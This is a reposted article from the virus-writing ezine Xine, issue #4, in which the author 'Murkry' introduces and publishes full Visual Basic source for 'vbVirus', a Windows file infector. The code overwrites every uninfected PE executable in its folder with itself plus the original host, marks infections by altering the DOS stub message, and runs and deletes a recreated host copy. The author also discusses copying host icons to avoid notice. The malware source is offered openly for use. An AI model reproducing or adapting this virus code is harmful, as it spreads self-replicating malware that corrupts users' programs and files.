Copy Link
Add to Bookmark
Report

Xine - issue #4 - Phile 304

eZine's profile picture
Published in 
Xine
 · 7 months ago

 
/-----------------------------\
| Xine - issue #4 - Phile 304 |
\-----------------------------/


vbVirus by Murkry

Well I need to learn VB or at least to become more familiar with the
coding debbugging ect in VB. So I did what was dear to my heart and
created a virus. I knew that other vb virus code was out there but most
were companion. So I used some tricks from ASM , and C that I knew and
applied them to VB a little reading of the help file and I was on my way.
The manner I use to infect the file, I believe standard High level Virus
activity, copy the orginal host to the end of the virus and rewrite the
entire file. On runing the infect file vbVirus Recreates an unifect file
and shells out to it.The marker is I check for the letter M in a EXE header
file. Read the sourcecode for more info. I use to dynamice byte arrays
to copy the virus and the host into then concat them. I alter the exe stub
so the msg now says

"Program can not run due to Murkry Poisoning."

I check for the M in Murkry
Of course like other viruses that infect in this manner the icon is now
the icon for the vbVirus. Which I am sure should be noticebale. Of course
as soon as someone figures out the method MS uses to located icons in the
.resc area we can copy that to our file and mimic the icon as well. I started
this idea in vb code already, and can now find the first icon in an exe file.
So I am sure it is a matter of time till this is done, then making viruses like
cerebrus ,or Sandmans virus which was written in C, and other of this type
will become more common place. Anyway read the code its sorta commented, Enjoy
it I doubt I will update it any time soon. unless I really want to try to copy
the icons in vb for some reason. I mean vb is nice but doing file access in it
is like using a butter knife to cut cement. You can do it but why when you have
a diamond tip saw.
Murkry


VERSION 5.00
Begin VB.Form VBinf
Caption = "vbVirus by Murkry/IkX"
ClientHeight = 1860
ClientLeft = 2730
ClientTop = 1740
ClientWidth = 6750
Icon = "VBinf.frx":0000
LinkTopic = "Form1"
ScaleHeight = 1860
ScaleWidth = 6750
Begin VB.CommandButton cmdExit
Caption = "E&xit"
Height = 600
Left = 2055
TabIndex = 0
Top = 1215
Width = 1710
End
End
Attribute VB_Name = "VBinf"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit
Private Victim As String 'holds the victim file name
Private HostLen As Long 'hods the victim file lenght
Private vbArray() As Byte 'hold the vbVirus code
Private hArray() As Byte 'holds the victims code
Private lenght As Long
Const MySize As Integer = 14336 'vbVirus size

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Sub Form_Initialize()
Dim i As Long
On Error GoTo vbVerror 'If an error show the form
'Error will occur if the user starts and
'ends the infected program to quickly
'other error now Write access...

'Copy the vbVirus code to an array to write out to a new file
'in a infect file we would only want to read in the vbVirus code
'which is why filecopy is not used here
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
As #1
ReDim vbArray(MySize)
Get #1, 1, vbArray
Close #1

'now copy the victim,into its array
'and the append the two arrays into a file
'overwriting the existing victim file

Victim = Dir(App.Path & "\" & "*.EXE")
While Victim <> ""

If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then
Open App.Path & "\" & Victim For Binary Access Read As #1
ReDim hArray(LOF(1))
Get #1, 1, hArray
Close #1

'To stop reinfection I make the DOS error msg say
' db "Program can not run due to Murkry Poisoning.",0dh,0ah,24h
'I then check if the M in Murkry is there in all new files
'Yes this will infect any .exe including DOS files but the
'infected exe will fail under anything but a Win32 enviroment
'displaying the above msg
If hArray(&H69) <> &H4D Then

i = hArray(&H3C)
If hArray(i) = &H50 Then
Open App.Path & "\" & Victim For Binary Access Write As #1
Put #1, , vbArray
Put #1, MySize, hArray
Close #1
End If 'Make sure its a PE file
End If 'Simple check to make sure we are not reinfecting
End If 'check for Current file name

Victim = Dir() 'Get Next victim

Wend

'All possible exe's have been infected by the vbVirus
'Now we need to generate the old host and spawn off it

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
lenght = LOF(1) - MySize
If lenght <> 0 Then
ReDim vbArray(lenght - 1)
Get #1, MySize, vbArray
Close #1

Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
Put #1, , vbArray
Close #1
'Routine to shell and wait for the host to close
'then delete the file. If while running the host the
'user copied that file he would have the orginal file back
'so this is one way to disinfect

idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill App.Path & "\" & App.EXEName & ".eve"

Else
Close #1

End If

End

vbVerror:

End Sub 'End the Init routines


Private Sub cmdExit_Click()
Unload Me
End Sub




← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT